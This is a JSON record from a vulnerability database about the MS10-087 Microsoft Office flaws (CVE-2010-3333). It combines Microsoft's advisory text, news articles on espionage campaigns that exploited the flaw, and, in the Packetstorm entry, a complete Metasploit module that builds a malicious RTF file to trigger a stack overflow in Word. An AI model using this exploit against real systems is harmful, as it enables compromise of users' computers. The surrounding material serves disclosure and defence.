Services.msc and then click OK.\r\n\r\n2.\r\n\t\r\n\r\nRight-click WebClient service and select Properties.\r\n\r\n3.\r\n\t\r\n\r\nChange the Startup type to Disabled. If the service is running, click Stop.\r\n\r\n4.\r\n\t\r\n\r\nClick OK and exit the management application.\r\n\r\nImpact of workaround. When the WebClient service is disabled, Web Distributed Authoring and Versioning (WebDAV) requests are not transmitted. In addition, any services that explicitly depend on the Web Client service will not start, and an error message will be logged in the System log. For example, WebDAV shares will be inaccessible from the client computer.\r\n\r\nHow to undo the workaround.\r\n\r\nTo re-enable the WebClient Service, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nClick Start, click Run, type Services.msc and then click OK.\r\n\r\n2.\r\n\t\r\n\r\nRight-click WebClient service and select Properties.\r\n\r\n3.\r\n\t\r\n\r\nChange the Startup type to Automatic. If the service is not running, click Start.\r\n\r\n4.\r\n\t\r\n\r\nClick OK and exit the management application.\r\n\u2022\t\r\n\r\nBlock TCP ports 139 and 445 at the firewall\r\n\r\nThese ports are used to initiate a connection with the affected component. Blocking TCP ports 139 and 445 at the firewall will help protect systems that are behind that firewall from attempts to exploit this vulnerability. Microsoft recommends that you block all unsolicited inbound communication from the Internet to help prevent attacks that may use other ports. For more information about ports, see the TechNet article, TCP and UDP Port Assignments.\r\n\r\nImpact of workaround. Several Windows services use the affected ports. Blocking connectivity to the ports may cause various applications or services to not function. Some of the applications or services that could be impacted are listed below:\r\n\u2022\t\r\n\r\nApplications that use SMB (CIFS)\r\n\u2022\t\r\n\r\nApplications that use mailslots or named pipes (RPC over SMB)\r\n\u2022\t\r\n\r\nServer (File and Print Sharing)\r\n\u2022\t\r\n\r\nGroup Policy\r\n\u2022\t\r\n\r\nNet Logon\r\n\u2022\t\r\n\r\nDistributed File System (DFS)\r\n\u2022\t\r\n\r\nTerminal Server Licensing\r\n\u2022\t\r\n\r\nPrint Spooler\r\n\u2022\t\r\n\r\nComputer Browser\r\n\u2022\t\r\n\r\nRemote Procedure Call Locator\r\n\u2022\t\r\n\r\nFax Service\r\n\u2022\t\r\n\r\nIndexing Service\r\n\u2022\t\r\n\r\nPerformance Logs and Alerts\r\n\u2022\t\r\n\r\nSystems Management Server\r\n\u2022\t\r\n\r\nLicense Logging Service\r\n\r\nHow to undo the workaround. Unblock TCP ports 139 and 445 at the firewall. For more information about ports, see TCP and UDP Port Assignments.\r\nTop of sectionTop of section\r\n\t\r\nFAQ for Insecure Library Loading Vulnerability - CVE-2010-3337\r\n\r\nWhat is the scope of the vulnerability? \r\nThis is a remote code execution vulnerability. An attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\r\n\r\nWhat causes the vulnerability? \r\nThis vulnerability requires a user to open a document contained within the same working directory as a specially crafted DLL file. The specially crafted DLL will be loaded into memory giving the attacker control of the affected system in the security context of the logged-on user.\r\n\r\nIs this vulnerability related to the issue described in Microsoft Security Advisory 2269637? \r\nYes, this vulnerability is related to the class of vulnerabilities that affect how applications load external libraries described in Microsoft Security Advisory 2269637. This security bulletin addresses a particular instance of this type of vulnerability.\r\n\r\nWhat might an attacker use the vulnerability to do? \r\nAn attacker who successfully exploited this vulnerability could run arbitrary code as the logged-on user. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. If a user is logged-on with administrative user rights, an attacker could take complete control of the affected system. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\n\r\nHow could an attacker exploit the vulnerability? \r\nThis vulnerability requires that a user open an office document in the same working directory as a specially crafted DLL file.\r\n\r\nIn an e-mail attack scenario, an attacker could exploit the vulnerability by convincing a user to place an Office file in the same folder as a specially crafted DLL file, and then convincing the user to open the Office file. When the user opens the Office file the specially crafted DLL file, which is contained in the same directory as the Office file, will be loaded.\r\n\r\nWhat systems are primarily at risk from the vulnerability? \r\nSystems where Microsoft Office is used, including workstations and terminal servers, are primarily at risk. Servers could be at more risk if administrators allow users to log on to servers and to run programs. However, best practices strongly discourage allowing this.\r\n\r\nHow is Microsoft Office affected by this vulnerability? \r\nAlthough the known attack vectors can only leverage Microsoft PowerPoint, the vulnerable code exists in a shared component of Microsoft Office.\r\n\r\nWhat does the update do? \r\nThis update addresses the vulnerability by helping to ensure the vulnerable component of Microsoft Office uses a more appropriate and secure search order when loading libraries.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed? \r\nYes. This vulnerability had been publicly disclosed when this security bulletin was originally issued.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited? \r\nNo. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers when this security bulletin was originally issued.\r\n\r\nOther Information\r\nAcknowledgments\r\n\r\nMicrosoft thanks the following for working with us to help protect customers:\r\n\u2022\t\r\n\r\nteam509, working with VeriSign iDefense Labs, for reporting the RTF Stack Buffer Overflow Vulnerability (CVE-2010-3333)\r\n\u2022\t\r\n\r\nDyon Balding of Secunia for reporting the Office Art Drawing Records Vulnerability (CVE-2010-3334)\r\n\u2022\t\r\n\r\nWill Dorman of CERT Coordination Center for reporting the Office Art Drawing Records Vulnerability (CVE-2010-3334)\r\n\u2022\t\r\n\r\nTippingPoint's Zero Day Initiative for reporting the Drawing Exception Handling Vulnerability (CVE-2010-3335)\r\n\u2022\t\r\n\r\nChaouki Bekrar of VUPEN Vulnerability Research Team for reporting the MSO Large SPID Read AV Vulnerability (CVE-2010-3336)\r\n\u2022\t\r\n\r\nHaifei Li of Fortinet\u2019s FortiGuard Labs for reporting the Insecure Library Loading Vulnerability (CVE-2010-3337)\r\n\u2022\t\r\n\r\nSimon Raner of ACROS Security for reporting the Insecure Library Loading Vulnerability (CVE-2010-3337)\r\nTop of sectionTop of section\r\nMicrosoft Active Protections Program (MAPP)\r\n\r\nTo improve security protections for customers, Microsoft provides vulnerability information to major security software providers in advance of each monthly security update release. Security software providers can then use this vulnerability information to provide updated protections to customers via their security software or devices, such as antivirus, network-based intrusion detection systems, or host-based intrusion prevention systems. To determine whether active protections are available from security software providers, please visit the active protections Web sites provided by program partners, listed in Microsoft Active Protections Program (MAPP) Partners.\r\n\r\nSupport\r\n\u2022\t\r\n\r\nCustomers in the U.S. and Canada can receive technical support from Security Support or 1-866-PCSAFETY. There is no charge for support calls that are associated with security updates. For more information about available support options, see Microsoft Help and Support.\r\n\u2022\t\r\n\r\nInternational customers can receive support from their local Microsoft subsidiaries. There is no charge for support that is associated with security updates. For more information about how to contact Microsoft for support issues, visit the International Support Web site.\r\n\r\nDisclaimer\r\n\r\nThe information provided in the Microsoft Knowledge Base is provided "as is" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.\r\n\r\nRevisions\r\n\u2022\t\r\n\r\nV1.0 (November 9, 2010): Bulletin published.", "edition": 1, "modified": "2010-11-10T00:00:00", "published": "2010-11-10T00:00:00", "id": "SECURITYVULNS:DOC:25106", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:25106", "title": "Microsoft Security Bulletin MS10-087 - Critical Vulnerabilities in Microsoft Office Could Allow Remote Code Execution (2423930)", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:39", "bulletinFamily": "software", "cvelist": ["CVE-2010-2572", "CVE-2010-3336", "CVE-2010-3337", "CVE-2010-3334", "CVE-2010-3335", "CVE-2010-3333", "CVE-2010-2573"], "description": "Multiple memory corruptions, buffer overflows, integer overflows.", "edition": 1, "modified": "2010-11-15T00:00:00", "published": "2010-11-15T00:00:00", "id": "SECURITYVULNS:VULN:11248", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11248", "title": "Microsoft Office multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:24:43", "description": "", "published": "2010-12-29T00:00:00", "type": "packetstorm", "title": "Microsoft Word RTF pFragments Stack Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-3333"], "modified": "2010-12-29T00:00:00", "id": "PACKETSTORM:97153", "href": "https://packetstormsecurity.com/files/97153/Microsoft-Word-RTF-pFragments-Stack-Buffer-Overflow.html", "sourceData": "`## \n# $Id: ms10_087_rtf_pfragments_bof.rb 11450 2010-12-29 20:30:50Z jduck $ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GreatRanking \n \ninclude Msf::Exploit::FILEFORMAT \ninclude Msf::Exploit::Seh \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Microsoft Word RTF pFragments Stack Buffer Overflow (File Format)', \n'Description' => %q{ \nThis module exploits a stack-based buffer overflow in the handling of the \n'pFragments' shape property within the Microsoft Word RTF parser. All versions \nof Microsoft Office prior to the release of the MS10-087 bulletin are vulnerable. \n \nThis module does not attempt to exploit the vulnerability via Microsoft Outlook. \n \nThe Microsoft Word RTF parser was only used by default in versions of Microsoft \nWord itself prior to Office 2007. With the release of Office 2007, Microsoft \nbegan using the Word RTF parser, by default, to handle rich-text messages within \nOutlook as well. It was possible to configure Outlook 2003 and earlier to use \nthe Microsoft Word engine too, but it was not a default setting. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'wushi of team509', # original discovery \n'unknown', # exploit found in the wild \n'jduck' # Metasploit module \n], \n'Version' => '$Revision: 11450 $', \n'References' => \n[ \n[ 'CVE', '2010-3333' ], \n[ 'OSVDB', '69085' ], \n[ 'MSB', 'MS10-087' ], \n[ 'BID', '44652' ], \n[ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=880' ] \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n}, \n'Payload' => \n{ \n'Space' => 512, \n'BadChars' => \"\\x00\", \n'DisableNops' => true # no need \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n# Office v11.8307.8324, winword.exe v11.0.8307.0 \n[ 'Microsoft Office 2003 SP3 English on Windows XP SP3 English', \n{ \n'Offsets' => [ 24536, 51112 ], \n'Ret' => 0x300294e7 # p/p/r in winword.exe \n} \n], \n \n# In order to exploit this bug on Office 2007, a SafeSEH bypass method is needed. \n=begin \n# Office v12.0.6425.1000, winword.exe v12.0.6425.1000 \n[ 'Microsoft Office 2007 SP2 English on Windows XP SP3 English', \n{ \n'Offsets' => [ 5912 ], \n'Ret' => 0x30001ceb # p/p/r in winword.exe \n} \n], \n=end \n \n# crash on a deref path to heaven. \n[ 'Crash Target for Debugging', \n{ \n'Offsets' => [ 65535 ], \n'Ret' => 0xdac0ffee \n} \n] \n], \n'DisclosureDate' => 'Nov 09 2010')) \n \nregister_options( \n[ \nOptString.new('FILENAME', [ true, 'The file name.', 'msf.rtf']), \n], self.class) \nend \n \ndef exploit \n \noffsets = target['Offsets'] \n \n# Prepare a sample SEH frame \nseh = generate_seh_record(target.ret) \n \n# Prepare a sample backward jump \ndistance = offsets.max \njmp_back = Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $-\" + distance.to_s).encode_string \n \n# RTF property Array parameters \nel_size = sz_rand() \nel_count = sz_rand() \n \ndata = '' \n# These words are presumably incorrectly used \n# assert(amount1 <= amount2) \ndata << [0x1111].pack('v') * 2 \ndata << [0xc8ac].pack('v') \ndata << [0x1111].pack('v') * 22 \n \n# Filler \nif target.name =~ /Debug/i \nrest = Rex::Text.pattern_create(offsets.max + seh.length + jmp_back.length) \nelse \nrest = rand_text(offsets.max + seh.length + jmp_back.length) \nend \n \n# Add the payload \nrest[0, payload.encoded.length] = payload.encoded \n \n# Fill in the seh frames \noffsets.each { |off| \nrest[off, seh.length] = seh \ndistance = off + seh.length \njmp_back = Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $-\" + distance.to_s).encode_string \nrest[off + seh.length, jmp_back.length] = jmp_back \n} \n \nsploit = \"%d;%d;\" % [el_size, el_count] \nsploit << data.unpack('H*').first \nsploit << rest.unpack('H*').first \n \ncontent = \"{\\\\rtf1\" \ncontent << \"{\\\\shp\" # shape \ncontent << \"{\\\\sp\" # shape property \ncontent << \"{\\\\sn pFragments}\" # property name \ncontent << \"{\\\\sv #{sploit}}\" # property value \ncontent << \"}\" \ncontent << \"}\" \ncontent << \"}\" \n \nprint_status(\"Creating '#{datastore['FILENAME']}' file ...\") \nfile_create(content) \n \nend \n \ndef sz_rand \nbad_sizes = [ 0, 2, 4, 8 ] \nx = rand(9) \nwhile bad_sizes.include? x \nx = rand(9) \nend \nx \nend \n \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/97153/ms10_087_rtf_pfragments_bof.rb.txt"}], "threatpost": [{"lastseen": "2018-10-06T23:06:23", "bulletinFamily": "info", "cvelist": ["CVE-2010-3333"], "description": "[](<https://threatpost.com/facing-attacks-rtf-hole-microsoft-urges-office-users-patch-010411/>)The Microsoft Malware Protection Center has urged users of its Office suite to apply a security update, [MS10-087](<https://threatpost.com/critical-office-hole-patched-november-release-110910/>), released last November. The company says it has become aware of attacks exploiting the hole in Office applications that are circulating on the Internet.\n\nThe security hole in question affects features that allow Microsoft Office applications to parse different file formats. The vulnerability in \nquestion, \u2018RTF Stack Buffer Overflow Vulnerability,\u2019 can be triggered in Microsoft Word with a specially formatted RTF (Rich Text Format) file. Microsoft says it has evidence of specially crafted RTF files circulating in the wild that attempt to trigger the vulnerability, according to a post on the [Microsoft Malware Protection Center blog](<http://blogs.technet.com/b/mmpc/archive/2010/12/29/targeted-attacks-against-recently-addressed-microsoft-office-vulnerability-cve-2010-3333-ms10-087.aspx>).\n\nIn overflow attacks, attackers are able to gain access to areas of a vulnerable machine\u2019s memory beyond what has been allocated for a particular job. That allows malicious code to be copied to unprotected areas of a victim\u2019s system and run -disrupting the operation of the machine or allowing the attacker to install their own code on the system. \n\nIn the wild, Microsoft found emails with files titled \u2018Bilawar \nBhutto Sex Scandal\u2019 and \u2018New Year\u2019s Greeting Card.\u2019 While the company isn\u2019t speculating on the origin or intended targets of the attacks, both the files themselves \nand their names were written in Russian.\n\nIn addition to \ninstalling the MS10- 087 upgrade, the Microsoft Malware Protection team recommends \nenabling the firewall, using up-to-date anti-virus software, limiting user privileges \nand using strong passwords on your computer as well as using caution when \nopening file attachments, accepting file transfers, and linking to unfamiliar \nwebsites.\n", "modified": "2013-04-17T20:09:46", "published": "2011-01-04T18:05:55", "id": "THREATPOST:4A77E471AA7DA847C227B575A8681E66", "href": "https://threatpost.com/facing-attacks-rtf-hole-microsoft-urges-office-users-patch-010411/74818/", "type": "threatpost", "title": "Facing Attacks on RTF Hole, Microsoft Urges Office Users To Patch", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:42", "bulletinFamily": "info", "cvelist": ["CVE-2010-3333", "CVE-2012-0158"], "description": "A new cyberespionage malware campaign with ties to China going back to the Titan Rain and Gh0stNet attacks has been targeting diplomats, military contractors and government agencies in 40 countries.\n\nResearchers at Kaspersky Lab today unveiled details on [NetTraveler](<http://www.securelist.com/en/blog/8105/NetTraveler_is_Running_Red_Star_APT_Attacks_Compromise_High_Profile_Victims>), a data exfiltration tool, which has infected more than 350 high profile victims using primarily exploits targeting two patched Microsoft vulnerabilities. Costin Raiu, senior security researcher and head of the Global Research and Analysis Team, told attendees today at the 2013 Cybersecurity Forum in Washington, D.C., that one backdoor used in the NetTraveler campaign was probably written by the same developers responsible for Gh0st RAT. In fact, Raiu said, the same group of 50 or so developers could be behind a number of similar espionage attacks dating back close to a decade.\n\n\u201cThere is a very common misconception that all these attacks are separate. In reality all these operations are connected to each other,\u201d Raiu said. \u201cThe NetTraveler attacks are loosely connected with the Gh0stNet attacks, which are loosely connected with Titan Rain.\n\n\u201cThey\u2019re just one big ugly gorilla with a thousand faces and of course we haven\u2019t seen all of them yet,\u201d Raiu said.\n\nIn addition to diplomats and government targets, NetTraveler samples were found to be targeting Tibetan and Uyghur activists, oil production facilities, scientific research outfits, universities and private companies. The tool is capable of extracting system information, drop keylogging malware, steal Office documents such as Word, Excel and PowerPoint files, and its configuration can be modified if necessary to steal Corel Draw designs, AutoCAD files and other file types used in manufacturing and defense circles. The files are then compressed and encoded via custom protocols that resemble BASE64 code and sent to a command and control server via HTTP.\n\nThe attacker\u2019s IP operation ranges, the Kaspersky report said, overlap with that of a malware family known as Zegost, or the Gh0st remote access Trojan; one of the Zegost command and control servers was still active as of a few weeks ago. They\u2019re also used to distribute the Saker, a backdoor module used to steal system information that shares export functions via two DLLs named JustTempFun and ServiceMain. Those DLL names are also found in Gh0st RAT, the Kaspersky researchers said.\n\nSome of the victims targeted by NetTraveler, meanwhile, are also victims of Red October. However, Kaspersky has not connected the attackers in these two campaigns.\n\n\u201cAlthough we see no direct links between the NetTraveler attackers and the Red October threat actor, the existence of victims infected by both of these campaigns is interesting. These infections indicate that certain high profile victims are targeted by multiple threat actors; the target information is a valuable commodity,\u201d the report said, adding that the victims include a Russian military contractor, a Tajikistan government entity and embassy workers in Iran, Belguim, Kazakhstan and Belarus.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2013/06/07045233/nettraveler_03s.png>)\n\nThe attacks start with a spear phishing campaign targeting vulnerabilities described in [CVE-2012-0158](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0158>) and[ CVE-2010-3333](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3333>). The messages and attached decoy documents vary according to the various targets and use a number of exploits that enable remote code execution and exploit of memory vulnerabilities in Office documents. Both have been patched, yet these attacks demonstrate the vulnerabilities are still reachable on some systems; no zero-days, rootkits or other advanced malware have been used in the NetTraveler campaign.\n\nKaspersky researchers found more than 22 gigabytes of stolen data on command and control servers they were able to sinkhole and analyze.\n\n\u201cHowever this data represents only a small fraction which we managed to see \u2013 the rest of the it had been previously downloaded and deleted from the C&C servers by the attackers,\u201d a report on the campaign said.\n\nKaspersky researchers said the command and control servers were running IIS 6 and 7 and a Microsoft ASP backend. The attackers transferred the stolen data from the command infrastructure using FTP through a VPN connection to a server in the U.S. hosted by Krypt Technologies. \u201cThe infrastructure is secured by allowing FTP access only to remote users coming from predefined IPs, including the VPN provider in the U.S.,\u201d the report said.\n\nIn all, more than 30 command and control servers are used in the NetTraveler campaign and all either collect stolen data or help with obfuscation of the attacks. NetTraveler is so named because of a string found in all early versions of the malware: \u201cNetTraveler Is Running!\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2013/06/07045237/nettraveler_02.1s.png>)\n\nMost of the victims are diplomats, government agencies or military contractors, the report said. Combining data from the command and control servers and Kaspersky Security Network, almost 30 percent of infections happened in Mongolia, followed by Russia, India and Kazakhstan.\n\nKaspersky\u2019s GReAT team released a research report on NetTraveler, which includes indicators of compromise, that can be downloaded [here](<https://media.threatpost.com/wp-content/uploads/sites/103/2013/06/22105852/kaspersky-the-net-traveler-part1-final-1.pdf>).\n", "modified": "2018-03-22T14:58:55", "published": "2013-06-04T12:35:54", "id": "THREATPOST:67D34DEB790B708B10391D13A8BE6EAB", "href": "https://threatpost.com/net-traveler-espionage-campaign-uncovered-links-to-gh0st-rat-titan-rain-found/100865/", "type": "threatpost", "title": "NetTraveler Espionage Malware Campaign Ties to Gh0st RAT", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:42", "bulletinFamily": "info", "cvelist": ["CVE-2010-3333", "CVE-2017-11882"], "description": "[](<https://threatpost.com/critical-office-hole-patched-november-release-110910/>)Microsoft issued its monthly patch on Tuesday, releasing three security bulletins to fix security holes in a range of products, including a critical hole in versions of the Microsoft Office Suite. \n\nThe three bulletins, MS10-087, 088 and -089 fixed a total of 11 vulnerabilities, five in Microsoft Office, two in Microsoft Office PowerPoint and four in Microsoft Unified Access Gateway. The release comes one month after a massive, October patch consisting of 16 bulletins addressing 49 vulnerabilities across a range of products. \n\nFollowing that patch tsunami, November offers a relative respite, as Microsoft indicated in its [pre-release guidance last week](<https://threatpost.com/microsoft-patch-critical-office-flaw-110410/>). Of the three bulletins, only one is rated critical: MS10-087, which fixes holes in versions of the Office Suite ranging from Office XP SP3 to Office 2010. Among the holes patched is a[ stack buffer overflow vulnerability](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3333>) that\u2019s rated critical for Office 2007, SP2 and for the 32 and 64 bit versions of Office 2010. \n\nStack buffer overflows occur when a program writes to a memory address that\u2019s outside the call stack, or data structure, allocated for that program \u2013 often by sending more data to a fixed length buffer than was intended. Attackers can use this type of programming vulnerability to place malicious code on the vulnerable system and run it with the permissions accorded to the vulnerable application. \n\nIn this case, attackers could use a Rich Text Format (RTF) file to trigger the overflow. Microsoft rated the vulnerability critical due to a recognized attack vector that could use the Outlook e-mail message preview pane to trigger the vulnerability, [according to a post](<https://blogs.technet.com/b/msrc/>) on Microsoft\u2019s Security Resource Center (MSRC) blog. The bulletin also closes an Office-based attack vector for a widespread \u201cDLL Preloading\u201d vulnerability[ that garnered attention after security researcher HD Moore posted information ](<https://threatpost.com/dll-hijacking-exploit-code-posted-powerpoint-other-apps-082410/>)on applications from a variety of vendors that contained the flaw in August. \n\n[MS10-088](<http://www.microsoft.com/technet/security/bulletin/ms10-088.mspx>) fixes what Microsoft describes as \u201ccooperatively disclosed\u201d holes in the PowerPoint 2002 Service Pack 3 and 2004, Service Pack 3. [MS10-089](<http://www.microsoft.com/technet/security/bulletin/ms10-089.mspx>) fixes application and Unified Access Gateway (UAG), a remote access product that is part of the Microsoft Forefront family of products. \n", "modified": "2013-04-17T16:35:43", "published": "2010-11-09T20:55:12", "id": "THREATPOST:5DA1737F4321D42086053820C84CCFB0", "href": "https://threatpost.com/critical-office-hole-patched-november-release-110910/74655/", "type": "threatpost", "title": "Critical Office Hole Patched In November Release", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:01:15", "bulletinFamily": "info", "cvelist": ["CVE-2010-3333", "CVE-2012-0158"], "description": "A series of targeted attacks are continuing to bully a signed Nvidia application into dropping a backdoor that lets attackers root their way through the systems of Tibetan sympathizers.\n\nAccording to [Sophos\u2019 Gabor Szappanos](<http://nakedsecurity.sophos.com/2013/02/27/targeted-attack-nvidia-digital-signature/>), the multifaceted attack can install a backdoor on unsuspecting users\u2019 machines to siphon off system information, including the computer\u2019s name and OS version along with other bits of sensitive information.\n\nFirst the campaign makes use of an old Microsoft Office vulnerability (CVE-2012-0158) that\u2019s been [used in multiple exploit vectors over the last six months](<https://threatpost.com/tool-scans-rtf-files-spreading-malware-targeted-attacks-091412/>). The vulnerability primarily exploits rich text file (RTF) documents to distribute malware and gained popularity last month when it was announced it was one of four exploits [used in the Red October campaign](<https://threatpost.com/anti-tibetan-attack-stems-nvidia-abuse-old-rtf-vulnerability-022713/'s+Most+Popular>).\n\nWhile the vulnerability has been used in the past against Tibetan activists and other Asian military and energy targets, the way the attack leverages an authentic Nvidia tool is interesting.\n\nThe RTF document in this case is an article about the Tibetan Youth Congress that acts as a diversion while three files are dropped onto the system: Nv.exe, NvSmartMax.dll and NvSmartMax.dll.url. Nv.exe is a legitimate executable for Nvidia\u2019s Smart Maximise Helper Host, a tool that helps manage properties for the company\u2019s graphics cards. The DLL file is the malicious part of the equation here though, executing encrypted code in NvSmartMax.dll.url that ultimately compromises the computer and grants the attacker the following remote access functionality:\n\n\n\nThe whole campaign is awfully similar to one [used by the remote access tool PlugX, spotted by TrendMicro last September](<http://blog.trendmicro.com/trendlabs-security-intelligence/unplugging-plugx-capabilities/>). That attack relied on a different, older Microsoft RTF vulnerability (CVE-2010-3333) but also dropped a handful of Nvidia files, including NvSmartMax.dll, onto systems. Much like the most recent attack, in the 2012 attack NvSmartMax.dll boots up a backdoor (boot.ldr) that that can open and modify files on the infected system.\n\nSophos has a more detailed explanation of the attack, including its multi step process at [Naked Security](<http://nakedsecurity.sophos.com/2013/02/27/targeted-attack-nvidia-digital-signature/>).\n", "modified": "2013-04-17T16:30:37", "published": "2013-02-27T19:10:44", "id": "THREATPOST:3C3169D334DC65F9EAF925A5796C7ECF", "href": "https://threatpost.com/anti-tibetan-attack-stems-nvidia-abuse-old-rtf-vulnerability-022713/77570/", "type": "threatpost", "title": "Anti-Tibetan Attack Stems from Nvidia Abuse, Old RTF Vulnerability", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:01:02", "bulletinFamily": "info", "cvelist": ["CVE-2009-3129", "CVE-2010-3333", "CVE-2012-0158"], "description": "[](<https://threatpost.com/researchers-uncover-targeted-attack-campaign-using-android-malware-032613/>)Android attacks have become all the rage in the last year or two, and targeted attacks against political activists in Tibet, Iran and other countries also have been bubbling up to the surface more and more often lately. Now those two trends have converged with the discovery of a targeted attack campaign that\u2019s going after Tibetan and Uyghur activists with a spear-phishing message containing a malicious APK file. Researchers say the attack appears to be coming from Chinese sources.\n\nThe new campaign began a few days ago when unknown attackers were able to compromise the email account of a well-known Tibetan activist. The attackers then used that account to begin sending a series of spear-phishing messages to other activists in the victim\u2019s contact list. One of the messages referred to a human rights conference in Geneva in March, using the recipients\u2019 legitimate interest in the conference as bait to get them to open the attachment. The malicious attachment in the emails is named \u201cWUC\u2019s Conference.apk\u201d.\n\nOnce the victim opens the attachment on her Android phone, the file installs an application called \u201cconference\u201d that will display some information about the Geneva conference. Meanwhile, the malware is running in the background.\n\n\u201cWhile the victim reads this fake message, the malware secretly reports the infection to a command-and-control server. After that, it begins to harvest information stored on the device,\u201d according to an [analysis of the attack by Kaspersky Lab](<https://www.securelist.com/en/blog/208194186/Android_Trojan_Found_in_Targeted_Attack>) researchers.\n\n\u201cIt is important to note that the data won\u2019t be uploaded to C&C server automatically. The Trojan waits for incoming SMS messages (the \u201calarmReceiver.class\u201d) and checks whether these messages contain one of the following commands: \u201csms\u201d, \u201ccontact\u201d, \u201clocation\u201d, \u201cother\u201d. If one these commands is found, then the malware will encode the stolen data with Base64 and upload it to the command and control server.\u201d\n\n\n\nThe malware looks for a specific set of data, including contacts, call logs, SMS messages, geolocation and phone data. The malware communicates with a command-and-control server at the URL: _hxxp://64.78.161.133/*victims\u2019s_cell_phone_number*/process.php. _The malware authors apparently have some familiarity with the Tibetan language, as some of the commands use native words. However, there also are a number of Chinese words and commands in the code, as well.\n\n\u201cThroughout the code, the attackers log all important actions, which include various messages in Chinese. This was probably done for debugging purposes, indicating the malware may be an early prototype version,\u201d the Kaspersky analysis says.\n\nInterestingly, the C2 server for the attack is located in Los Angeles and is registered to a companybased in Beijing. While this is one of the first known targeted attack campaigns to utilize Android as a delivery mechanism, it likely won\u2019t be the last.\n\n\u201cEvery day, there are hundreds if not thousands of targeted attacks against Tibetan and Uyghur supporters. The vast majority of these target Windows machines through Word documents exploiting known vulnerabilities such as CVE-2012-0158, CVE-2010-3333 and CVE-2009-3129,\u201d the analysis says.\n\n\u201cIn this case, the attackers hacked a Tibetan activist\u2019s account and used it to attack Uyghur activists. It indicates perhaps an interesting trend which is exploiting the trust relationships between the two communities. This technique reminds us of a combination between ages old war strategies \u2018Divide et impera\u2019 and \u2018By way of deception\u2019.\u201d\n", "modified": "2013-04-17T16:30:29", "published": "2013-03-26T14:14:02", "id": "THREATPOST:4474B9334E9322D775C57232CC4127EF", "href": "https://threatpost.com/researchers-uncover-targeted-attack-campaign-using-android-malware-032613/77667/", "type": "threatpost", "title": "Researchers Uncover Targeted Attack Campaign Using Android Malware", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:01:36", "bulletinFamily": "info", "cvelist": ["CVE-2009-3120", "CVE-2010-3333", "CVE-2012-0158"], "description": "[](<https://threatpost.com/rocra-espionage-malware-campaign-uncovered-after-five-years-activity-011413/>)For five years, it hid in the weeds of networks used by Eastern European diplomats, government employees and scientific research organizations, stealing data and infecting more machines in an espionage campaign rivaling Flame and others of its ilk. The campaign, called Rocra or Red October by researchers at Kaspersky Lab, focused not only on workstations, but mobile devices and networking gear to gain a foothold inside strategic organizations. Once inside, attackers pivoted internally and stole everything from files on desktops, smartphones and FTP servers, to email databases using exploits developed in China and Russian malware, Kaspersky researchers said.\n\nWhile Kaspersky would not go so far as to call it a nation-state campaign, the resources behind the attackers and the targets they chose\u2014which also included oil and gas companies, aerospace, nuclear research, and trade and commerce organizations\u2014would indicate an interest in a particular type of information.\n\nMost of the victims were specific organizations in Eastern Europe, former USSR nations and countries in Central Asia. Some attacks were also noticed in 